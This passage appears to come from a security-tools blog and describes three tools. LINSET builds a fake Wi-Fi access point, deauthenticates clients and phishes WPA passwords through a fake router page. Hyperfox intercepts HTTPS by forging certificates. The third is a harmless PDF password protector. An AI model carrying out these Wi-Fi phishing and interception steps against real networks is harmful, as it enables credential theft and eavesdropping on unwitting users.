-jIjamminginterfaceChoose the interface for jamming. By default script will find the most powerful interface and starts monitor mode on it.
-aIapinterfaceChoose the interface for the fake AP. By default script will find the second most powerful interface and starts monitor mode on it.


Targeting an access point

A successful attack

Fake router configuration page

  • Kali Linux.
  • Two wireless network interfaces, one capable of injection.

LINSET - WPA/WPA2 Hack Without Brute Force


How it works
  • Scan the networks.
  • Select network.
  • Capture handshake (can be used without handshake)
  • We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)
  • Mounts one FakeAP imitating the original
  • A DHCP server is created on FakeAP
  • It creates a DNS server to redirect all requests to the Host
  • The web server with the selected interface is launched
  • The mechanism is launched to check the validity of the passwords that will be introduced
  • It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.
  • The attack will stop after the correct password checking
Are necessary tengais installed dependencies, which Linset check and indicate whether they are installed or not.

It is also preferable that you still keep the patch for the negative channel, because if not, you will have complications relizar to attack correctly

How to use
$ chmod +x linset
$ ./linset

Hyperfox - HTTP and HTTPs Traffic Interceptor


Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.

Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be succesfully intercepted and recorded.

Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.

Instant PDF Password Protector - Password Protect PDF file


Instant PDF Password Protector is the Free tool to quickly Password Protect PDF file on your system.

With a click of button, you can lock or protect any of your sensitive/private PDF documents. You can also use any of the standard Encryption methods - RC4/AES (40-bit, 128-bit, 256-bit) based upon the desired security level.

In addition to this, it also helps you set advanced restrictions to prevent Printing, Copying or Modification of target PDF file. To further secure it, you can also set 'Owner Password' (also called Permissions Password) to stop anyone from removing these restrictions.

'PDF Password Protector' includes Installer for quick installation/un-installation. It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

  • Instantly Password Protect PDF document with a click of button
  • Supports all versions of PDF documents
  • Lock PDF file with Password (User/Document Open Password)
  • Supports all the standard Encryption methods - RC4/AES (40-bit,128-bit, 256-bit)
  • [Advanced] Protect PDF file by adding following Restrictions
    • Copying
    • Printing
    • Signing
    • Commenting
    • Changing the Document
    • Document Assembly
    • Page Extraction
    • Filling of Form Fields
  • [Advanced] Set the Permission Password (Owner Password) to prevent removal of above restrictions
  • Advanced Settings Dialog to quickly alter above permissions/restrictions
  • Drag & Drop support for easier selection of PDF file
  • Very easy to use with simple & attractive GUI screen
  • Support for local Installation and uninstallation of the software

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